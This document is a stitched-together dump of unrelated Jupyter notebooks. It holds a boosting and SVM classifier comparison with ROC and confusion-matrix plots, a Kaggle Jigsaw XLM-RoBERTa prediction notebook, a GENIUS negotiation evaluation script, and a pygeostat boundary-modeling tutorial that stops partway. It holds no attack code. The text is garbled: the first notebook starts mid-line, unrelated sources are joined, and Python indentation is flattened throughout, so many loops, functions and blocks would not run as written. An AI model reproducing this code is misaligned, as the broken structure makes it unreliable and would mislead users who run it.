''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of XGBoost')
plt.legend(loc="lower right")
plt.savefig('figure/xgb_roc.png')
plt.show()
X = trainSet
y = trainLabel
title = "Learning Curve of XGBoost"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(xgb, title, X, y, (0.6, 1.01), cv=cv, n_jobs=4)
plt.show()
con_mat = confusion_matrix(testLabel, xgbResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis]  # normalize each row
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.title('Confusion Matrix of XGBoost')
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
plt.savefig('figure/xgb_confusion_matrix.png')
plt.show()
```
# AdaBoost
```
ad=AdaBoostClassifier(DecisionTreeClassifier(),algorithm="SAMME.R", n_estimators=100,learning_rate=0.1,random_state=0)
starttime = datetime.datetime.now()
ad.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print('training time:', (endtime - starttime))
starttime = datetime.datetime.now()
adResult = ad.predict(testSet)
endtime = datetime.datetime.now()
print('predicting time:', (endtime - starttime))
# save the model
joblib.dump(ad, 'model/ad.model')
from sklearn.metrics import f1_score
print("F-score: {0:.2f}".format(f1_score(testLabel, adResult, average='micro')))
print("the accuracy is:", np.mean(adResult == testLabel))
proba = ad.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=np.unique(testLabel))  # string labels; np.unique matches the sorted predict_proba column order
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
#print(testLabel[:, i])
#print(proba[:, i])
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], proba[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), proba.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of AdaBoost')
plt.legend(loc="lower right")
plt.savefig('figure/ad_roc.png')
plt.show()
X = trainSet
y = trainLabel
title = "Learning Curve of AdaBoost"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(ad, title, X, y, (0.4, 1.05), cv=cv, n_jobs=4)
plt.show()
con_mat = confusion_matrix(testLabel, adResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis]  # normalize each row
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.title('Confusion Matrix of AdaBoost')
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
plt.savefig('figure/ad_confusion_matrix.png')
plt.show()
```
# GBDT
```
gbdt = GradientBoostingClassifier(random_state=0,n_estimators=100,learning_rate=0.1,subsample=0.8)
starttime = datetime.datetime.now()
gbdt.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print('training time:', (endtime - starttime))
starttime = datetime.datetime.now()
gbdtResult = gbdt.predict(testSet)
endtime = datetime.datetime.now()
print('predicting time:', (endtime - starttime))
# save the model
joblib.dump(gbdt,"model/gbdt_model.h5")
from sklearn.metrics import f1_score
print("F-score: {0:.3f}".format(f1_score(testLabel, gbdtResult, average='micro')))
print("the accuracy is:", np.mean(gbdtResult == testLabel))
proba = gbdt.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=np.unique(testLabel))  # string labels; np.unique matches the sorted predict_proba column order
lw =2
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
#print(testLabel[:, i])
#print(proba[:, i])
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], proba[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), proba.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of GBDT')
plt.legend(loc="lower right")
plt.savefig('figure/gbdt_roc.png')
plt.show()
X = trainSet
y = trainLabel
title = "Learning Curve of GBDT"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(gbdt, title, X, y, (0.6, 1.01), cv=cv, n_jobs=4)
plt.show()
con_mat = confusion_matrix(testLabel, gbdtResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis]  # normalize each row
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.title('Confusion Matrix of GBDT')
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
plt.savefig('figure/gbdt_confusion_matrix.png')
plt.show()
```
# SVM
```
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC
svm = Pipeline([("scaler", StandardScaler()),
                ("linear_svc", LinearSVC(C=1, loss="hinge"))])  # newer sklearn requires a list of steps, not a tuple
# start time
starttime = datetime.datetime.now()
svm.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print('training time:', (endtime - starttime))
starttime = datetime.datetime.now()
svmResult = svm.predict(testSet)
endtime = datetime.datetime.now()
print('predicting time:', (endtime - starttime))
# save the model
joblib.dump(svm,"model/svm_model.h5")
from sklearn.metrics import f1_score
print("F-score: {0:.3f}".format(f1_score(testLabel, svmResult, average='micro')))
print("the accuracy is:", np.mean(svmResult == testLabel))
# LinearSVC has no predict_proba, so use decision_function scores for the ROC curves instead
testLabel_bi = label_binarize(testLabel, classes=np.unique(testLabel))
y_score = svm.decision_function(testSet)  # the pipeline was already fitted above, so no refit is needed
lw =2
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
#print(testLabel[:, i])
#print(proba[:, i])
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], y_score[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), y_score.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of SVM')
plt.legend(loc="lower right")
plt.savefig('figure/svm_roc.png')
plt.show()
X = trainSet
y = trainLabel
title = "Learning Curve of SVM"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(svm, title, X, y, (0.80, 1.01), cv=cv, n_jobs=4)
plt.show()
con_mat = confusion_matrix(testLabel, svmResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis]  # normalize each row
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.title('Confusion Matrix of SVM')
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
# save the figure
plt.savefig('figure/svm_confusion_matrix.png')
plt.show()
```
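For a linear SVM, the `decision_function` score fed into the ROC code above is just the signed quantity `w·x + b`: its sign picks the class and its magnitude acts as a confidence. A sketch with made-up weights and input:

```python
import numpy as np

w = np.array([2.0, -1.0])  # learned weights (illustrative)
b = 0.5                    # bias term (illustrative)
x = np.array([1.0, 1.0])

score = np.dot(w, x) + b  # sign -> predicted side of the hyperplane
print(score)  # 1.5
```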
## Dependencies
```
import glob, json
from jigsaw_utility_scripts import *
from tensorflow.keras import layers
from tensorflow.keras.models import Model
from transformers import TFXLMRobertaModel, XLMRobertaConfig
```
## TPU configuration
```
strategy, tpu = set_up_strategy()
print("REPLICAS: ", strategy.num_replicas_in_sync)
AUTO = tf.data.experimental.AUTOTUNE
```
# Load data
```
database_base_path = '/kaggle/input/jigsaw-dataset-split-toxic-roberta-base-192/'
x_test_path = database_base_path + 'x_test.npy'
x_test = np.load(x_test_path)
print('Test samples %d' % len(x_test[0]))
```
# Model parameters
```
input_base_path = '/kaggle/input/12-jigsaw-train-3fold-xlm-roberta-base/'
with open(input_base_path + 'config.json') as json_file:
config = json.load(json_file)
config
vocab_path = input_base_path + 'vocab.json'
merges_path = input_base_path + 'merges.txt'
model_path_list = glob.glob(input_base_path + '*.h5')
model_path_list.sort()
print('Models to predict:')
print(*model_path_list, sep = "\n")
```
# Model
```
module_config = XLMRobertaConfig.from_pretrained(config['config_path'], output_hidden_states=False)
def model_fn(MAX_LEN):
input_ids = layers.Input(shape=(MAX_LEN,), dtype=tf.int32, name='input_ids')
attention_mask = layers.Input(shape=(MAX_LEN,), dtype=tf.int32, name='attention_mask')
base_model = TFXLMRobertaModel.from_pretrained(config['base_model_path'], config=module_config)
sequence_output = base_model({'input_ids': input_ids, 'attention_mask': attention_mask})
last_state = sequence_output[0]
cls_token = last_state[:, 0, :]
output = layers.Dense(1, activation='sigmoid', name='output')(cls_token)
model = Model(inputs=[input_ids, attention_mask], outputs=output)
return model
```
# Make predictions
```
NUM_TEST_SAMPLES = len(x_test[0])
test_preds = np.zeros((NUM_TEST_SAMPLES, 1))
for model_path in model_path_list:
tf.tpu.experimental.initialize_tpu_system(tpu)
print(model_path)
with strategy.scope():
model = model_fn(config['MAX_LEN'])
model.load_weights(model_path)
# test_preds += np.round(model.predict(list(x_test))) / len(model_path_list)
test_preds += np.round(model.predict(get_test_dataset(x_test, config['BATCH_SIZE'], AUTO))) / len(model_path_list)
```
# Test set predictions
```
submission = pd.read_csv('/kaggle/input/jigsaw-multilingual-toxic-comment-classification/sample_submission.csv')
submission['toxic'] = test_preds
submission.to_csv('submission.csv', index=False)
submission.head(10)
```
| github_jupyter |
```
## This note is just for COMP6200, not for general users
## load all experiments and generate Comparative Results to each domain and each agent
import warnings
warnings.filterwarnings('ignore')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import *
%matplotlib inline
from trackgenius.predictutility import PredictUtilitySpace
## load experiments information before evaluation
def exp_summary(Experiments):
## extract titles
header_list = list(Experiments)[1:]
domain_prefer_path = []
## extract domain and preference paths
for i in header_list:
i = i.split(";")
domain_prefer_path.append(i)
## extract log files
Total_log_file_list = []
for j in range(len(header_list)):
log_file_list = []
for i in Experiments[header_list[j]]:
log_file_list.append(i)
Total_log_file_list.append(log_file_list)
Domain_list = [i.split("/")[-2] for i in header_list]
return header_list, domain_prefer_path, Total_log_file_list, Domain_list
## generate experiment evaluation for each Domain
def nash_evaluation(GENIUS_Path,
Log_path,
header_list,
domain_prefer_path,
Total_log_file_list,
Visulisation = True,
print_result = True):
Domain_list = [domain_prefer_path[i][2].split("/")[-2] for i in range(len(header_list))]
Domain_dict_nash_diff = {i:[] for i in Domain_list}
Domain_dict_Pare_acc = {i:[] for i in Domain_list}
## for every Domain
for domain_index in range(len(header_list)):
## basic parameters
DOMAIN_Path = GENIUS_Path + domain_prefer_path[domain_index][2]
Domains = domain_prefer_path[domain_index][0:2]
Log_file = Total_log_file_list[domain_index]
if print_result == True:
print("Target Domain:", DOMAIN_Path.split("/")[-2])
for nego in range(len(Log_file)):
## initialisation
NegoPredicting = PredictUtilitySpace(DOMAIN_Path,
Domains,
Log_path,
Log_file[nego])
info_summary = NegoPredicting.background()
## the steps of outcome space estimation
## (the first figure is the outcome space with full information)
for Agents in info_summary["Agents"]:
pred_summary, info_Nash_Pareto_Pred = NegoPredicting.predicting(info_summary, Agents,
Visulisation = Visulisation,
print_result = print_result)
Domain_dict_nash_diff[Domain_list[domain_index]].append(info_Nash_Pareto_Pred["Nash_diff"])
Domain_dict_Pare_acc[Domain_list[domain_index]].append(info_Nash_Pareto_Pred["Pareto_acc"])
return Domain_dict_nash_diff, Domain_dict_Pare_acc
class CONFIG:
GENIUS_Path = "/Users/songsifan/Genius/"
Log_path = GENIUS_Path + "log/"
csv_path = "./Experiments.csv"
save_path = "./plots/"
Experiments = pd.read_csv(CONFIG.csv_path)
header_list, domain_prefer_path, Total_log_file_list, Domain_list = exp_summary(Experiments)
Domain_list = ["D4_1", "D4_2", "D5_1", "D5_2", "D6_1", "D6_2", "D8"]
Domain_dict_nash_diff, Domain_dict_Pare_acc = nash_evaluation(GENIUS_Path = CONFIG.GENIUS_Path,
Log_path = CONFIG.Log_path,
header_list = header_list,
domain_prefer_path = domain_prefer_path,
Total_log_file_list = Total_log_file_list,
Visulisation = False,
print_result = False)
## difference between ground-truth and predicted Nash values
fig, axes = plt.subplots(nrows=1, ncols=1)
axes.bar(Domain_list, [np.mean(Domain_dict_nash_diff[i]) for i in Domain_dict_nash_diff.keys()], alpha = 0.5)
axes.set_ylabel('Nash_diff')
axes.set_title('Nash_estimation')
axes.legend(["mean_Nash_diff"])
axes.set_ylim([0, 3])
save_name = "mean_Nash_diff.png"
fig.savefig(CONFIG.save_path + save_name, bbox_inches='tight')
## accuracy between ground-truth and predicted Pareto frontier bids
fig, axes = plt.subplots(nrows=1, ncols=1)
axes.bar(Domain_list, [np.mean(Domain_dict_Pare_acc[i]) for i in Domain_dict_Pare_acc.keys()], alpha = 0.5)
axes.set_ylabel('Pareto_acc')
axes.set_title('Pareto_Frontier_estimation_acc')
axes.legend(["mean_Pareto_acc"])
axes.set_ylim([0, 1])
save_name = "mean_Pareto_acc.png"
fig.savefig(CONFIG.save_path + save_name, bbox_inches='tight')
data_box = []
for domain in [*Domain_dict_Pare_acc]:
data = np.concatenate((Domain_dict_Pare_acc[domain],
[np.percentile(Domain_dict_Pare_acc[domain], 50)*len(Domain_dict_Pare_acc[domain])],
[np.percentile(Domain_dict_Pare_acc[domain], 75)*len(Domain_dict_Pare_acc[domain])],
[np.percentile(Domain_dict_Pare_acc[domain], 25)*len(Domain_dict_Pare_acc[domain])]))
data_box.append(data)
fig, axes = plt.subplots(nrows=1, ncols=1)
axes.boxplot(data_box, 0)
axes.set_ylim([0, 1.1])
axes.set_ylabel('Pareto_acc')
axes.set_title('Pareto_Frontier_estimation_acc')
save_name = "mean_Pareto_acc_box.png"
fig.savefig(CONFIG.save_path + save_name, bbox_inches='tight')
```
| github_jupyter |
<a href="https://colab.research.google.com/github/CcgAlberta/pygeostat/blob/master/examples/BoundaryModeling.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Boundary Modeling
The following notebook consists of 7 primary steps:
1. Initialize required packages, directories and parameters
2. Load and inspect the domain indicator data
3. Calculate and model the boundary indicator variogram
4. Calculate and model the Gaussian variogram that yields the indicator variogram when truncated
5. Model the distance function
6. Simulate boundary realizations, through truncation of simulated distance function deviates
7. Save project setting and clean the output files
## 1. Initialize required packages and parameters
```
import pygeostat as gs
import numpy as np
import os
import pandas as pd
import matplotlib.pyplot as plt
```
### Project settings
Load the previously set Matplotlib and Pygeostat settings.
```
#path to GSLIB executables
exe_dir="../pygeostat/executable/"
gs.Parameters['data.griddef'] = gs.GridDef('''
120 5.0 10.0
110 1205.0 10.0
1 0.5 1.0''')
gs.Parameters['data.catdict'] = {1: 'Inside', 0: 'Outside'}
# Data values
gs.Parameters['data.tmin'] = -998
gs.Parameters['data.null'] = -999
# Color map settings
gs.Parameters['plotting.cmap'] = 'bwr'
gs.Parameters['plotting.cmap_cat'] = 'bwr'
# Number of realizations
nreal = 100
gs.Parameters['data.nreal'] = nreal
# Parallel Processing threads
gs.Parameters['config.nprocess'] = 4
# Pot Style settings
gs.PlotStyle['legend.fontsize'] = 12
gs.PlotStyle['font.size'] = 11
```
### Directories
```
# Create the output directory
outdir = 'Output/'
gs.mkdir(outdir)
```
## 2. Load and Inspect the Boundary Data
Note that content in this section was explained in the introduction notebooks. Only new concepts are generally annotated in detail.
### Load the data and note its attributes
```
dat = gs.ExampleData('reservoir_boundary', cat='Domain Indicator')
dat.info
```
### Data content and summary statistics
```
print(dat.describe())
dat.head()
```
### Map of the indicator
```
gs.location_plot(dat)
```
## 3. Calculate and Model the Indicator Variogram
The indicator variogram is calculated and modeled, since this is required input to calculation of the Gaussian variogram model in the next section (used for distance function $df$ modeling).
### Apply the variogram object for convenience
Variogram calculation, modeling, plotting and checking are readily accomplished with the variogram object, although unprovided parameters are inferred.
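In this workflow the experimental variogram itself is computed by the GSLIB `varcalc` executable. Conceptually, what it computes is the experimental semivariogram $\gamma(h) = \frac{1}{2N(h)}\sum_{N(h)}\left(z(u)-z(u+h)\right)^2$ over lag bins. A minimal pure-NumPy sketch of that calculation (an illustration only, not the GSLIB implementation; directional and bandwidth tolerances are omitted):

```python
import numpy as np

def experimental_variogram(coords, values, lag_length, n_lags, lag_tol):
    """Omnidirectional experimental semivariogram over lag bins.

    gamma(h) = 1 / (2 N(h)) * sum of (z(u) - z(u + h))^2 over the
    N(h) pairs whose separation falls within lag_tol of each lag.
    """
    # Pairwise separation distances and squared value differences
    d = np.linalg.norm(coords[:, None, :] - coords[None, :, :], axis=-1)
    sq_diff = (values[:, None] - values[None, :]) ** 2
    upper = np.triu(np.ones_like(d, dtype=bool), k=1)  # count each pair once
    lags, gammas = [], []
    for k in range(1, n_lags + 1):
        in_bin = upper & (np.abs(d - k * lag_length) <= lag_tol)
        if in_bin.any():
            lags.append(d[in_bin].mean())
            gammas.append(0.5 * sq_diff[in_bin].mean())
    return np.array(lags), np.array(gammas)

# Four collinear points with alternating indicator values
coords = np.array([[0.0, 0.0], [1.0, 0.0], [2.0, 0.0], [3.0, 0.0]])
values = np.array([0.0, 1.0, 0.0, 1.0])
lags, gammas = experimental_variogram(coords, values, 1.0, 2, 0.1)
print(gammas)  # gamma at lag 1 is 0.5; at lag 2 the values match, so 0.0
```

The variogram object below does this (and much more) internally, with proper tolerance handling.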
```
# get the proportions
proportion = sum(dat['Domain Indicator'])/len(dat)
print('Proportion of inside data: %.3f'%(proportion))
variance = proportion - proportion**2
# Perform data spacing analysis
dat.spacing(n_nearest=1)
lag_length = dat['Data Spacing (m)'].values.mean()
print('average data spacing in XY plane: {:.3f} {}'.format(lag_length,
gs.Parameters['plotting.unit']))
mean_range = (np.ptp(dat[dat.x].values) + np.ptp(dat[dat.y].values)) * 0.5
n_lag = np.ceil((mean_range * 0.5) / lag_length)
lag_tol = lag_length * 0.6
var_calc = gs.Program(program=exe_dir+'varcalc')
parstr = """ Parameters for VARCALC
**********************
START OF PARAMETERS:
{file} -file with data
2 3 0 - columns for X, Y, Z coordinates
1 4 - number of variables,column numbers (position used for tail,head variables below)
{t_min} 1.0e21 - trimming limits
{n_directions} -number of directions
0.0 90 1000 0.0 22.5 1000 0.0 -Dir 01: azm,azmtol,bandhorz,dip,diptol,bandvert,tilt
{n_lag} {lag_length} {lag_tol} - number of lags,lag distance,lag tolerance
{output} -file for experimental variogram points output.
0 -legacy output (0=no, 1=write out gamv2004 format)
1 -run checks for common errors
1 -standardize sills? (0=no, 1=yes)
1 -number of variogram types
1 1 10 1 {variance} -tail variable, head variable, variogram type (and cutoff/category), sill
"""
n_directions = 1
varcalc_outfl = os.path.join(outdir, 'varcalc.out')
var_calc.run(parstr=parstr.format(file=dat.flname,
n_directions = n_directions,
t_min = gs.Parameters['data.tmin'],
n_lag=n_lag,
lag_length = lag_length,
lag_tol = lag_tol,
variance = variance,
output=varcalc_outfl),
liveoutput=True)
varfl = gs.DataFile(varcalc_outfl)
varfl.head()
var_model = gs.Program(program=exe_dir+'varmodel')
parstr = """ Parameters for VARMODEL
***********************
START OF PARAMETERS:
{varmodel_outfl} -file for modeled variogram points output
1 -number of directions to model points along
0.0 0.0 100 6 - azm, dip, npoints, point separation
2 0.05 -nst, nugget effect
1 ? 0.0 0.0 0.0 -it,cc,azm,dip,tilt (ang1,ang2,ang3)
? ? ? -a_hmax, a_hmin, a_vert (ranges)
1 ? 0.0 0.0 0.0 -it,cc,azm,dip,tilt (ang1,ang2,ang3)
? ? ? -a_hmax, a_hmin, a_vert (ranges)
1 100000 -fit model (0=no, 1=yes), maximum iterations
1.0 - variogram sill (can be fit, but not recommended in most cases)
1 - number of experimental files to use
{varcalc_outfl} - experimental output file 1
1 1 - # of variograms (<=0 for all), variogram #s
1 0 10 - # pairs weighting, inverse distance weighting, min pairs
0 10.0 - fix Hmax/Vert anis. (0=no, 1=yes)
0 1.0 - fix Hmin/Hmax anis. (0=no, 1=yes)
{varmodelfit_outfl} - file to save fit variogram model
"""
varmodel_outfl = os.path.join(outdir, 'varmodel.out')
varmodelfit_outfl = os.path.join(outdir, 'varmodelfit.out')
var_model.run(parstr=parstr.format(varmodel_outfl= varmodel_outfl,
varmodelfit_outfl = varmodelfit_outfl,
varcalc_outfl = varcalc_outfl), liveoutput=False, quiet=True)
varmdl = gs.DataFile(varmodel_outfl)
varmdl.head()
ax = gs.variogram_plot(varfl, index=1, color='b', grid=True, label = 'Indicator Variogram (Experimental)')
gs.variogram_plot(varmdl, index=1, ax=ax, color='b', experimental=False, label = 'Indicator Variogram (Model)')
_ = ax.legend(fontsize=12)
```
## 4. Calculate and model the Gaussian Variogram
The Gaussian variogram that yields the indicator variogram after truncation of a Gaussian random field is calculated. This Gaussian variogram is then modeled and used as input to $df$ modeling.
#### Calculate the Gaussian variogram
The bigaus2 program applies the Gaussian integration method, given the indicator variogram and the proportion of the indicator.
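The underlying identity (a standard bivariate-Gaussian result, stated here from general theory rather than from the `bigaus2` source) is: with $p$ the proportion, $y_p = \Phi^{-1}(p)$ the Gaussian threshold, and $\rho(h)$ the Gaussian correlogram,

$$ P\big(Y(\mathbf{u})\le y_p,\ Y(\mathbf{u}+\mathbf{h})\le y_p\big) = p^2 + \frac{1}{2\pi}\int_0^{\rho(h)} \frac{1}{\sqrt{1-t^2}}\,\exp\!\left(-\frac{y_p^2}{1+t}\right)dt $$

so the indicator variogram follows as $\gamma_I(h) = p - P\big(Y(\mathbf{u})\le y_p,\ Y(\mathbf{u}+\mathbf{h})\le y_p\big)$. `bigaus2` inverts this relationship numerically to recover the Gaussian $\rho(h)$ from the modeled $\gamma_I(h)$.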
```
bigaus2 = gs.Program(exe_dir+'bigaus2')
parstr = """ Parameters for BIGAUS2
**********************
START OF PARAMETERS:
1 -input mode (1) model or (2) variogram file
nofile.out -file for input variogram
{proportion} -threshold/proportion
2 -calculation mode (1) NS->Ind or (2) Ind->NS
{outfl} -file for output of variograms
1 -number of thresholds
{proportion} -threshold cdf values
1 {n_lag} -number of directions and lags
0 0.0 {lag_length} -azm(1), dip(1), lag(1)
{varstr}
"""
with open(varmodelfit_outfl, 'r') as f:
varmodel_ = f.readlines()
varstr = ''''''
for line in varmodel_:
varstr += line
pars = dict(proportion=proportion,
lag_length=lag_length,
n_lag=n_lag,
outfl= os.path.join(outdir, 'bigaus2.out'),
varstr=varstr)
bigaus2.run(parstr=parstr.format(**pars), nogetarg=True)
```
### Data manipulation to handle an odd data format
The bigaus2 program outputs an odd (legacyish) variogram format, which must be translated to the standard Variogram format.
```
# Read in the data before demonstrating its present form
expvargs = gs.readvarg(os.path.join(outdir, 'bigaus2.out'), 'all')
expvargs.head()
varclac_gaussian = gs.DataFile(data = varfl.data[:-1].copy(), flname=os.path.join(outdir,'gaussian_exp_variogram.out'))
varclac_gaussian['Lag Distance'] = expvargs['Distance']
varclac_gaussian['Variogram Value'] = expvargs['Value']
varclac_gaussian.write_file(varclac_gaussian.flname)
varclac_gaussian.head()
```
### Gaussian variogram modeling
This model is input to distance function estimation.
```
parstr = """ Parameters for VARMODEL
***********************
START OF PARAMETERS:
{varmodel_outfl} -file for modeled variogram points output
1 -number of directions to model points along
0.0 0.0 100 6 - azm, dip, npoints, point separation
2 0.01 -nst, nugget effect
3 ? 0.0 0.0 0.0 -it,cc,azm,dip,tilt (ang1,ang2,ang3)
? ? ? -a_hmax, a_hmin, a_vert (ranges)
3 ? 0.0 0.0 0.0 -it,cc,azm,dip,tilt (ang1,ang2,ang3)
? ? ? -a_hmax, a_hmin, a_vert (ranges)
1 100000 -fit model (0=no, 1=yes), maximum iterations
1.0 - variogram sill (can be fit, but not recommended in most cases)
1 - number of experimental files to use
{varcalc_outfl} - experimental output file 1
1 1 - # of variograms (<=0 for all), variogram #s
1 0 10 - # pairs weighting, inverse distance weighting, min pairs
0 10.0 - fix Hmax/Vert anis. (0=no, 1=yes)
0 1.0 - fix Hmin/Hmax anis. (0=no, 1=yes)
{varmodelfit_outfl} - file to save fit variogram model
"""
varmodel_outfl_g = os.path.join(outdir, 'varmodel_g.out')
varmodelfit_outfl_g = os.path.join(outdir, 'varmodelfit_g.out')
var_model.run(parstr=parstr.format(varmodel_outfl= varmodel_outfl_g,
varmodelfit_outfl = varmodelfit_outfl_g,
varcalc_outfl = varclac_gaussian.flname), liveoutput=True, quiet=False)
varmdl_g = gs.DataFile(varmodel_outfl_g)
varmdl_g.head()
fig, axes = plt.subplots(1, 2, figsize= (15,4))
ax = axes[0]
ax = gs.variogram_plot(varfl, index=1, ax=ax, color='b', grid=True, label = 'Indicator Variogram (Experimental)')
gs.variogram_plot(varmdl, index=1, ax=ax, color='b', experimental=False, label = 'Indicator Variogram (Model)')
_ = ax.legend(fontsize=12)
ax = axes[1]
gs.variogram_plot(varclac_gaussian, index=1, ax=ax, color='g', grid=True, label = 'Gaussian Variogram (Experimental)')
gs.variogram_plot(varmdl_g, index=1, ax=ax, color='g', experimental=False, label = 'Gaussian Variogram (Model)')
_ = ax.legend(fontsize=12)
```
## 5. Distance Function $df$ Modeling
The $df$ is calculated at the data locations, before being estimated at the grid locations. The $c$ parameter is applied to the $df$ calculation, defining the bandwidth of uncertainty that will be simulated in the next section.
